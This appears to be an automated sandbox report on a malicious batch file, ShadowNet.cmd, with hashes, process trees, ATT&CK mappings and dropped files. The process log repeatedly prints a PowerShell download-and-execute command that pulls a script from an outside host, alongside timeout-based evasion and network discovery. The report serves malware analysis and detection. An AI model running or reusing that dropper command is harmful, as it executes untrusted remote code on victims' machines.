d410dcbc5db8abc8183a6bed991796fea78ddec35c58e1738d2aebfe881db8de

General

Target

ShadowNet.cmd
Size

910B
MD5

8abd83ade831474a6be58f4c977f9c5e
SHA1

4ad98ab76bb80bb761a9804bde10f825157ac546
SHA256

7d97d6f4c1e747c765ee4aac95e98d64513bf19d6a3fa236feaaa2369bf9ad38
SHA512

776bb7779bd83323e6fda69e3d12dc4c91c3d9efd167ccdd3897086310feb7b76fcd7471395ba4743b9a642d326d4c6a3def8e45ffaba2cdbc6370ef31e903df

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://10.127.0.83:8080/script.ps1

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3052 powershell.exe
4368 powershell.exe
2180 powershell.exe
1812 powershell.exe
1872 powershell.exe
Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1740 timeout.exe
2792 timeout.exe
3440 timeout.exe
3996 timeout.exe
1940 timeout.exe
5112 timeout.exe
1764 timeout.exe
4480 timeout.exe
4812 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

888 ipconfig.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4384 NOTEPAD.EXE

pid	process
1740	timeout.exe
2792	timeout.exe
3440	timeout.exe
3996	timeout.exe
1940	timeout.exe
5112	timeout.exe
1764	timeout.exe
4480	timeout.exe
4812	timeout.exe

pid	process
888	ipconfig.exe

pid	process
4384	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
4368	powershell.exe
4368	powershell.exe
4368	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
1812	powershell.exe
1812	powershell.exe
1812	powershell.exe
1872	powershell.exe
1872	powershell.exe
1872	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 3672 wrote to memory of 888	3672	cmd.exe	ipconfig.exe
PID 3672 wrote to memory of 888	3672	cmd.exe	ipconfig.exe
PID 2964 wrote to memory of 5112	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 5112	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 3052	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 3052	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 1740	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 1740	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 1764	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 1764	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 4368	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 4368	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 4480	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 4480	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 2792	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 2792	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 2180	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 2180	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 3440	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 3440	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 3996	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 3996	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 1812	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 1812	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 1940	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 1940	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 4812	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 4812	2964	cmd.exe	timeout.exe
PID 2964 wrote to memory of 1872	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 1872	2964	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ShadowNet.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.0.83:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1740

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.0.83:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4480

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.0.83:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3440

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.0.83:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.0.83:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:4724

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\system32\ipconfig.exe
ipconfig
2⤵
- Gathers network information
PID:888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1352 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:1020

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:3976

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1320

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ShadowRatControll.cmd
1⤵
- Opens file in notepad (likely ransom note)
PID:4384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3688 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3800

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6dcfceef4586db0670f731761136ab57

SHA1
4284bce5437768340658a61d0be728d22210515a

SHA256
5c49bcb872a27280dbd7551b39f524cd598cb7fa6e8ed0088ca43943a9e38f61

SHA512
8aa0e6a62a3333dbbd9f0edd2643af99adfdd082273129b7905959ad9a663860484aabd35cfdccf78f94896ab3d3b11936e2b445ce92c9663ca92a0c4da0c10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4ca55971e407cc5b645d97c3ae64f70f

SHA1
92f3f6df14d126288af8508ab6dd3d859fa2002c

SHA256
85ffc098951542ac720f5f669a96ddbbbc42793718662a801c322e05bcca7567

SHA512
ba2337c6276f08e68e045f787d3aecfc551d4bb4929c54dae19d53169680761cbc7d9f92c5ee68d61a714aced34a4482411d9b0400d04d4027bd3c71d7c2daa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f782bf3f4c706c19c070039c275599f4

SHA1
e5b13cf4cfb407239addd345e8dd201526d50e51

SHA256
67148e549cc2722bf8c8f95686eb7f7775ad6d2a25c5b418647bf36d11e129f0

SHA512
f33de7a4108a770b14e22c9f3f1a8da5b7fc38fc1ed37882102dcc6e237ed53f3a4d3263f23a055c094a80f16e24885dedf9b1fc2296b834862f6bab553a86bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
03ec002cabcb6fa42bc085a2c3c8bb6b

SHA1
3ea4ddecb6b21d4dd0bf23e25c047d96facd9be7

SHA256
9d77b742cdd8676ca90da1e7e31693cf5a79b1d310a290b99b1ad3896209db3d

SHA512
316fd8f5df6d679deb4c5640ef27b401955e1c4015385d6158691fb245d673a7db0a5253152857aaccd93a8f4efdf4783f034485c1fbe9c2cb8a3faf301fa3a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_raqihrgq.dek.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt
Filesize
3B

MD5
bc949ea893a9384070c31f083ccefd26

SHA1
cbb8391cb65c20e2c05a2f29211e55c49939c3db

SHA256
6bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61

SHA512
e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt
Filesize
389B

MD5
bec3d822bd1a8a7caadf692af84b386e

SHA1
f4c42431c06c6b822ce810cee20dced67311345f

SHA256
7596873eaa7ec02a0a6a20aa57858e96162cbe72e4c0db850bca6d5209f796d0

SHA512
ecd0c6952eaa112a5bff5b2d4877aa3da10ce0cdb3a0ac51d2eec7452a2ce13d40764e31d51436cbb3fc63ba3aae9ce4950b848d14250dc1972b4669d981516a

Download Submit
memory/1812-68-0x0000024DF5A00000-0x0000024DF5A19000-memory.dmp

Filesize
100KB

Download
memory/1872-85-0x0000020A73E60000-0x0000020A73E79000-memory.dmp

Filesize
100KB

Download
memory/3052-18-0x00007FFEAA8F0000-0x00007FFEAB3B1000-memory.dmp

Filesize
10.8MB

Download
memory/3052-14-0x00007FFEAA8F0000-0x00007FFEAB3B1000-memory.dmp

Filesize
10.8MB

Download
memory/3052-13-0x00007FFEAA8F0000-0x00007FFEAB3B1000-memory.dmp

Filesize
10.8MB

Download
memory/3052-1-0x00007FFEAA8F3000-0x00007FFEAA8F5000-memory.dmp

Filesize
8KB

Download
memory/3052-12-0x00007FFEAA8F0000-0x00007FFEAB3B1000-memory.dmp

Filesize
10.8MB

Download
memory/3052-2-0x000002A8D3A80000-0x000002A8D3AA2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads